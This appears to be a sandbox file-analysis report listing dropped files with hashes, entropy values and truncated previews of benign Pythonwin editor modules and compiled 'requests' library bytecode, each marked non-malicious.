                                                                                                                                                                                                                                  MD5:332D0E872EC47EEDB2AB3977608B8030
                                                                                                                                                                                                                                  SHA1:257F0DA57EDFA8DD6139572C41A4F96F37BB238A
                                                                                                                                                                                                                                  SHA-256:2A79B8ECBE1BEFDBA9779742C1662A5C51F7B4E02630F0A5E79CCA47C9B2056C
                                                                                                                                                                                                                                  SHA-512:DC641DE102D9EF4EDCEE5DCAAD347CA5E264A664041718592875CAB75EBA60E8BCEC88B89E540175F0AEC4105FF5D14A130959C4E4ACB7757F06E3DC8528B8E6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import codecs.import re.import string..import win32con.import win32ui.from pywin import default_scintilla_encoding.from pywin.mfc import docview..from . import scintillacon..crlf_bytes = "\r\n".encode("ascii").lf_bytes = "\n".encode("ascii")..# re from pep263 - but we use it both on bytes and strings..re_encoding_bytes = re.compile("coding[:=]\s*([-\w.]+)".encode("ascii")).re_encoding_text = re.compile("coding[:=]\s*([-\w.]+)")..ParentScintillaDocument = docview.Document...class CScintillaDocument(ParentScintillaDocument):. "A SyntEdit document.".. def __init__(self, *args):. self.bom = None # the BOM, if any, read from the file.. # the encoding we detected from the source. Might have. # detected via the BOM or an encoding decl. Note that in. # the latter case (ie, while self.bom is None), it can't be. # trusted - the user may have edited the encoding decl between. # open and save.. self.source_encoding = None. ParentScin
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16767
                                                                                                                                                                                                                                  Entropy (8bit):4.472904609296871
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:XOmx0wcpIIdQQ8uHcuBTWLOG+sZt4DMj9WAge+gnBGEF/R+sjTAL6:XOK0whIdQwiBWAgeTnBGEg+
                                                                                                                                                                                                                                  MD5:43EEE7F984417490D1A5762541F1FA55
                                                                                                                                                                                                                                  SHA1:D725A912D96EF3A0E6ECD8E803DA69F741A4B4D2
                                                                                                                                                                                                                                  SHA-256:8795FF82596A683F8C66C906C69D4DF9A908053224B2BB42EF933E45563AC3B1
                                                                                                                                                                                                                                  SHA-512:67BB7C160C94BFA66D2B3F667782C650B7E008CACB02E5FE0714418740136DE7EBDB377166384C70CAEFD88003A6F5387981CD27AF10921B2D30C01F3814969B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# find.py - Find and Replace.import afxres.import win32api.import win32con.import win32ui.from pywin.framework import scriptutils.from pywin.mfc import dialog..FOUND_NOTHING = 0.FOUND_NORMAL = 1.FOUND_LOOPED_BACK = 2.FOUND_NEXT_FILE = 3...class SearchParams:. def __init__(self, other=None):. if other is None:. self.__dict__["findText"] = "". self.__dict__["replaceText"] = "". self.__dict__["matchCase"] = 0. self.__dict__["matchWords"] = 0. self.__dict__["acrossFiles"] = 0. self.__dict__["remember"] = 1. self.__dict__["sel"] = (-1, -1). self.__dict__["keepDialogOpen"] = 0. else:. self.__dict__.update(other.__dict__).. # Helper so we cant misspell attributes :-). def __setattr__(self, attr, val):. if not hasattr(self, attr):. raise AttributeError(attr). self.__dict__[attr] = val...curDialog = None.lastSearch = defaultSearch = SearchParams().se
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26477
                                                                                                                                                                                                                                  Entropy (8bit):4.642478730234446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ZtCUb7G63428DdfC6epkn29/rD/R7/RYd:ZtCUb7R3+YrD5g
                                                                                                                                                                                                                                  MD5:564750E4B264BB2215CBCA6B86C3A939
                                                                                                                                                                                                                                  SHA1:A90B44FDE7B72D7C0F6444FB9EE5A5DD778558C7
                                                                                                                                                                                                                                  SHA-256:C949D863189E53E64A3E4E4698259A7C08AA97E3B021D874AB02554D3F53DEFE
                                                                                                                                                                                                                                  SHA-512:6511065D73986943C28A2EEF44EB1F795D670983939800F06186E06895646365D65490699088997F00E9ECC492874E7A763C515F7EEDEF0E95B8E7C7AA96BDE4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Does Python source formatting for Scintilla controls..import array.import string..import win32api.import win32con.import win32ui..from . import scintillacon..WM_KICKIDLE = 0x036A..# Used to indicate that style should use default color.from win32con import CLR_INVALID..debugging = 0.if debugging:. # Output must go to another process else the result of. # the printing itself will trigger again trigger a trace... import win32trace. import win32traceutil.. def trace(*args):. win32trace.write(" ".join(map(str, args)) + "\n")..else:. trace = lambda *args: None...class Style:. """Represents a single format""".. def __init__(self, name, format, background=CLR_INVALID):. self.name = name # Name the format representes eg, "String", "Class". # Default background for each style is only used when there are no. # saved settings (generally on first startup). self.background = self.default_background = background. if type(format) ==
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3902
                                                                                                                                                                                                                                  Entropy (8bit):5.789773042831559
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:QqPoGNOeYVGivMhhFJQlIgSdAhoupVaxdses42WQXIBmPy6V7:RP8MhqKgSeh8dFQYBwh
                                                                                                                                                                                                                                  MD5:6EF94DE82A5FB4D691EB84350F7CC525
                                                                                                                                                                                                                                  SHA1:AC315954690BF0E4EDFDD4B7D1B1FBD37BFE4D91
                                                                                                                                                                                                                                  SHA-256:FD857670319C0B5AE37790F3AE714966DB60BC3DB6AF931DB5BDADDEC584385B
                                                                                                                                                                                                                                  SHA-512:D322EBC1CEDAF2C06138688F1C9A3F43A125CF4FF1A432E68FAF0CAAC5C4D21752CA32EF76E7A47464F39DEC8B34135BAE909C00A3E7887116A2FF83F898ACF7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...sL...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.y#......d.Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y7......d.Z.Y.n.w.d.d...Z.d.d...Z.z.e.e.j.e.e.....W.n...e.e.f.y`......e...d...e.j.e.e...e.....Y.n.w.z.z.d.d.l.Z.W.n...e.ys......d.Z.Y.n.w.e.e.d.d...s.d.d.l.m.Z...e.......d.d.l.m.Z...e.e.....W.n...e.y.......Y.n.w.d.d.l.m.Z...e...d.e.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m.Z...d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1..d.d.l.m2Z2m3Z3m4Z4m5Z5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZD..e..EeF...Ge.......e.j.d.e4d.d.....d.S.).a.....Requests HTTP Library.~~~~~~~~~~~~~~~~~~~~~..Requests is an HTTP library, written in Python, for human beings..Basic GET usage:.. >>> import requests. >>> r = requests.get('https://www.python.org'). >>> r.status_code. 200. >>> b'Python is a programming language' in r.content. True..... or POST:.. >>> payload = dict(key1='value1', key2='value2
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):516
                                                                                                                                                                                                                                  Entropy (8bit):5.52370899308328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CAHUexOsG8ReRyu7msvBXV5b4SazcAFAu63WcwbRm7hooookk:tZxdOyqmsvBF5McAFAu6pw14ek
                                                                                                                                                                                                                                  MD5:AC9724E4CB098C3FF8AEAB3A4D73EEDD
                                                                                                                                                                                                                                  SHA1:BE813398A2E7F4E4F06BD244286BEE050185AD2F
                                                                                                                                                                                                                                  SHA-256:3040883CF10C2FB614018082BFEFA05479B61B837BAFFCD7398D250DF766C8F9
                                                                                                                                                                                                                                  SHA-512:4504D8C5678DFDDC7B21CB9BE19885381814A4DEBD158A3A8B23AF08B5A9D98F70037372028C48D1EBCDE1CDDA1F40A6FC4715A2E49A943B119C375B5F01B5DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s,...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...requestsz.Python HTTP for Humans.z.https://requests.readthedocs.ioz.2.32.3i.2..z.Kenneth Reitzz.me@kennethreitz.orgz.Apache-2.0z.Copyright Kenneth Reitzu..... .. .N)...__title__..__description__..__url__..__version__..__build__..__author__..__author_email__..__license__..__copyright__..__cake__..r....r.....DC:\Users\Public\M20EKMMEH2\lib\site-packages\requests\__version__.py..<module>....s........................
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1592
                                                                                                                                                                                                                                  Entropy (8bit):5.6578879401098865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tmUBWAmpGWydoNxLeucr1OlX4Ja8me5Q+:E0j95+nipYqa8me5Q+
                                                                                                                                                                                                                                  MD5:98C5449652DC5EDA5D3ABCBB85EA4AB9
                                                                                                                                                                                                                                  SHA1:F1E7CB691E9F3D62737755BBC6C205BE205FACA9
                                                                                                                                                                                                                                  SHA-256:411DD2E7DBF3C31F71BC487C14D051CA72DA4329400CFDE4515F43E19FC54BEE
                                                                                                                                                                                                                                  SHA-512:888578D43DBD614EA7190E705FB52BCC073B6875BB5A4467B9A48A34ADF1B4ACAD4E382FCFB55DC8C6155978B9635337B463905250F94233A16EB0B0C8CC4E56
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...sr...d.Z.d.d.l.Z.d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e.e.f.Z.e.e.f.Z.e.e.e.e.i.Z.d.d.d...Z.d.d...Z.d.S.).z..requests._internal_utils.~~~~~~~~~~~~~~..Provides utility functions that are consumed internally by Requests.which depend on extremely few external helpers (such as compat)......N.....)...builtin_strs....^[^:\s][^:\r\n]*$z.^[^:\s][^:\r\n]*$s....^\S[^\r\n]*$|^$z.^\S[^\r\n]*$|^$..asciic....................C...s ...t.|.t...r.|.}.|.S.|...|...}.|.S.).z.Given a string object, regardless of type, returns a representation of. that string in the native string type, encoding and decoding where. necessary. This assumes ASCII unless told otherwise.. )...isinstancer......decode)...string..encoding..out..r.....HC:\Users\Public\M20EKMMEH2\lib\site-packages\requests\_internal_utils.py..to_native_string....s..............r....c....................C...s4...t.|.t...s.J...z.|...d.....W.d.S...t.y.......Y.d.S.w.).z.Determine if unicode
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22006
                                                                                                                                                                                                                                  Entropy (8bit):5.4313805771320975
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:YmMtzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:g0TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                                                  MD5:47DE8B36F055B471245EC7DB9FC108D9
                                                                                                                                                                                                                                  SHA1:0F0C8E3600BD98F5D75A0C228928013BBE02785F
                                                                                                                                                                                                                                  SHA-256:563AF6289FA08B14AD111CE236ED42EB033FDEBCFECF34ECA8F5872835F1E2D7
                                                                                                                                                                                                                                  SHA-512:6267C70CA3962C86906D653384FE3663BFCD6B78F39E140D6E1C275D2635884175DFE6CD5542044324CAE7C0F3577574FBC10E0C23F1E10C2A10698B323EAA0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22006
                                                                                                                                                                                                                                  Entropy (8bit):5.4313805771320975
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:YmMtzG/lVfA1fIGIZ4Wj6EE28aauabYqpXMNpeux9URUlegWjvPWVhynNJRIVv8l:g0TQfIGw4qpmcUp5luxifgCWSYvH9yck
                                                                                                                                                                                                                                  MD5:47DE8B36F055B471245EC7DB9FC108D9
                                                                                                                                                                                                                                  SHA1:0F0C8E3600BD98F5D75A0C228928013BBE02785F
                                                                                                                                                                                                                                  SHA-256:563AF6289FA08B14AD111CE236ED42EB033FDEBCFECF34ECA8F5872835F1E2D7
                                                                                                                                                                                                                                  SHA-512:6267C70CA3962C86906D653384FE3663BFCD6B78F39E140D6E1C275D2635884175DFE6CD5542044324CAE7C0F3577574FBC10E0C23F1E10C2A10698B323EAA0C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f;k.......................@...s&...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m.Z.m,Z,m-Z-m.Z.m.Z.m/Z/m0Z0m.Z...d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;m<Z<..z.d.d.l=m>Z>..W.n...e?y.......d.d...Z>Y.n.w.e.j@r.d.d.l1mAZA..d.ZBd.ZCd.ZDd.ZEz.d.d.lFZFe!..ZGeG.He7e6......W.n...e?y.......d.ZGY.n.w........ .!.".#.$.%.&d-d'd(..ZIG.d)d*..d*..ZJG.d+d,..d,eJ..ZKd.S.).z..requests.adapters.~~~~~~~~~~~~~~~~~..This module contains the transport adapters that Requests uses to define.and maintain connections.......N)...ClosedPoolError..ConnectTimeoutError)...HTTPError)...InvalidHeader)...LocationValueError..MaxRetryError..NewConnectionError..ProtocolError)...ProxyError)...ReadTimeoutError..ResponseError)...SSLError)...PoolManager..proxy_from_url)...Timeout)...parse_ur
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6692
                                                                                                                                                                                                                                  Entropy (8bit):5.146225255700994
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:s4kMfrO7AyGLluXW87ZolNAzj8t8aYat9DMGm6RGmOsGmfiC:wMDY7EeZjM81eRys2C
                                                                                                                                                                                                                                  MD5:2BCB2D36DF4C178ED0826624ED585D1C
                                                                                                                                                                                                                                  SHA1:12D3806F8787A474DBC78BBD3947C56B9BEEB577
                                                                                                                                                                                                                                  SHA-256:ED348057B20F3E1E87FB9FF738444BD1410D648C2AB58F36A32BABB147739A1E
                                                                                                                                                                                                                                  SHA-512:4A919D8F37FF1B9EDC798C06D56892D37030AF54971ABCEC3F2B8063A12688779DF7FBA9F13494CAF57EDBFAA1D08D385D505FEC2FC3744C4AA45B45528E3ADC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f1........................@...s\...d.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z..requests.api.~~~~~~~~~~~~..This module implements the Requests API...:copyright: (c) 2012 by Kenneth Reitz..:license: Apache2, see LICENSE for more details.......)...sessionsc....................K...sB...t.......}.|.j.d.|.|.d...|.....W...d.........S.1.s.w.......Y...d.S.).a....Constructs and sends a :class:`Request <Request>`... :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``.. :param url: URL for the new :class:`Request` object.. :param params: (optional) Dictionary, list of tuples or bytes to send. in the query string for the :class:`Request`.. :param data: (optional) Dictionary, list of tuples, bytes, or file-like. object to send in the body of the :class:`Request`.. :param json: (optional) A JSON serializable Python object to se
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8088
                                                                                                                                                                                                                                  Entropy (8bit):5.488681652839057
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5B0um1AjzLPVCFA1PCGLcBCJI1W22VjwTrhhbVYy:X0um1iVCOPCGLRWW22aTNhl
                                                                                                                                                                                                                                  MD5:6F7F57A6A0C65F7D0D74915BF4132A49
                                                                                                                                                                                                                                  SHA1:377768563A3B648AD171C78316B50D466E159228
                                                                                                                                                                                                                                  SHA-256:B71C9C19E76971C869BA0B3FBE8BF8ECCC2A8AD8B786071B8D4B44FFCBE8E7C4
                                                                                                                                                                                                                                  SHA-512:2946F5C8EBB40C60AA93A32DA67CD9CA8CC3D5477E2AB7BF74F60330072E684E973EE3E2A827FE6F6BA95571344C18C354C0D3203632757D82D147C10734BA9F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.'.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z].requests.auth.~~~~~~~~~~~~~..This module contains the authentication handlers for Requests.......N)...b64encode.....)...to_native_string)...basestring..str..urlparse)...extract_cookies_to_jar)...parse_dict_headerz!application/x-www-form-urlencodedz.multipart/form-datac....................C...s....t.|.t...s.t.j.d...|...t.d.....t.|...}.t.|.t...s(t.j.d...t.|.....t.d.....t.|...}.t.|.t...r2|...d...}.t.|.t...r<|...d...}.d.t.t.d...|.|.f.............}.|.S.).z.Returns a Basic Auth string.z.Non-string usernames will no longer be supported in Requests 3.0.0. Please convert the object you've passed in ({!r}) to a string or bytes object in the near future to avoid problems.)...categoryz.Non-string passwords will no longer be supported in Requests 3.0
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                                  Entropy (8bit):5.305022762068304
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:CA67OBe1A3Dj4uIy1XfB4A4kvYa4Zk3S2sUCc01gbRUcENM:t6jgbXKAhwa93DRCk1Z
                                                                                                                                                                                                                                  MD5:1ECBEF9AF18F87C4E186D078940DCF06
                                                                                                                                                                                                                                  SHA1:B039F13A484308944CF61D4AE53BC1A6E2A25BC4
                                                                                                                                                                                                                                  SHA-256:28ADC812C57BF53DF2B15A92462CFB477DC1998134A86FE82AACC82DC9FDAC2B
                                                                                                                                                                                                                                  SHA-512:8B89C3C3E8A0EA634AAE418ABC20A508EA1AE1B5D77450FB7C80BBE3E4463B2DD3C0500317786366B648B23167157761ED90BA3362D31C82B5DED179EAF2F33B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...s*...d.Z.d.d.l.m.Z...e.d.k.r.e.e.......d.S.d.S.).uF....requests.certs.~~~~~~~~~~~~~~..This module returns the preferred default CA certificate bundle. There is.only one . the one from the certifi package...If you are packaging Requests, e.g., for a Linux distribution or a managed.environment, you can change the definition of where() to return a separately.packaged CA bundle.......)...where..__main__N)...__doc__Z.certifir......__name__..print..r....r.....>C:\Users\Public\M20EKMMEH2\lib\site-packages\requests\certs.py..<module>....s..............
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1744
                                                                                                                                                                                                                                  Entropy (8bit):5.603505530552
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:tNAUIkbGXHyOLyRJV79xllKPV+5MTYGi4k0b8+:nR8XyUyRJJ9pKPV+5f4kI
                                                                                                                                                                                                                                  MD5:164321AF07A551EC064491F8C409D891
                                                                                                                                                                                                                                  SHA1:0829701F0B0FAB3D9C6CDB13B3B741064CD5E3E1
                                                                                                                                                                                                                                  SHA-256:5C26B7E8C90B3239765E95A9FE641C45510E1501F96BE2575F0045D9DCED34C0
                                                                                                                                                                                                                                  SHA-512:467F01D3FA58B4AD6F91A4E56F6CB5B501F8710ADBB3C17CA27382F40DC6C371F0B7D608F1DE3E5C9A751D59360DC5C3DDADD48F248923BB0509F1FB139871F4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d...Z.e...Z.e.j.Z.e.d...d.k.Z.e.d...d.k.Z.d.Z.z.d.d.l.Z.d.Z.W.n...e.y7......d.d.l.Z.Y.n.w.e.rAd.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'm(Z(m)Z)m*Z*m+Z+..e,Z-e,Z,e.Z.e,e.f.Z/e0e1f.Z2e0f.Z3d.S.).z..requests.compat.~~~~~~~~~~~~~~~..This module previously handled import compatibility issues.between Python 2 and Python 3. It remains for backwards.compatibility until the next major version.......Nc....................C...s<...d.}.d.D.].}.|.d.u.r.z.t...|...}.W.q...t.y.......Y.q.w.q.|.S.).z-Find supported character detection libraries.N)...chardet..charset_normalizer)...importlib..import_module..ImportError).r......lib..r.....?C:\Users\Public\M20EKMMEH2\lib\site-packages\requests\compat.py.._resolve_char_detection....s........................r..............FT)...JSONDecodeError)...OrderedDict)...Callable..Mapping..Mut
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18687
                                                                                                                                                                                                                                  Entropy (8bit):5.258375917169328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:lEvXhBn08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:lEvXhBn08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                                                  MD5:1D7DE402C32D4ED2214C1AB8D135923A
                                                                                                                                                                                                                                  SHA1:BB0C7E982C7D825851C7FE55B064838FDBE5BCD5
                                                                                                                                                                                                                                  SHA-256:FB3914458951282DBB6C0532500592030BD8FBA7BCF36B77DA09FB3FDD653C79
                                                                                                                                                                                                                                  SHA-512:BCDBEFCBA7B36EC38E9A3A2D6E48CBD8CCBBDDC4DE98CFDB84608D6AF33C6206F9D95627D91134D626B255F882258C84624D3AAE29F889C87F04A64F09ECFC78
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18687
                                                                                                                                                                                                                                  Entropy (8bit):5.258375917169328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:lEvXhBn08OcOwp5PmoFKcA8YIL0RE9IFHQSAMGHQJCVGjxPA0lcQH:lEvXhBn08HbpZB0AVeiIVByHQs0php
                                                                                                                                                                                                                                  MD5:1D7DE402C32D4ED2214C1AB8D135923A
                                                                                                                                                                                                                                  SHA1:BB0C7E982C7D825851C7FE55B064838FDBE5BCD5
                                                                                                                                                                                                                                  SHA-256:FB3914458951282DBB6C0532500592030BD8FBA7BCF36B77DA09FB3FDD653C79
                                                                                                                                                                                                                                  SHA-512:BCDBEFCBA7B36EC38E9A3A2D6E48CBD8CCBBDDC4DE98CFDB84608D6AF33C6206F9D95627D91134D626B255F882258C84624D3AAE29F889C87F04A64F09ECFC78
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o.......?..f.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6195
                                                                                                                                                                                                                                  Entropy (8bit):4.921639769974512
                                                                                                                                                                                                                                  Encrypted:false
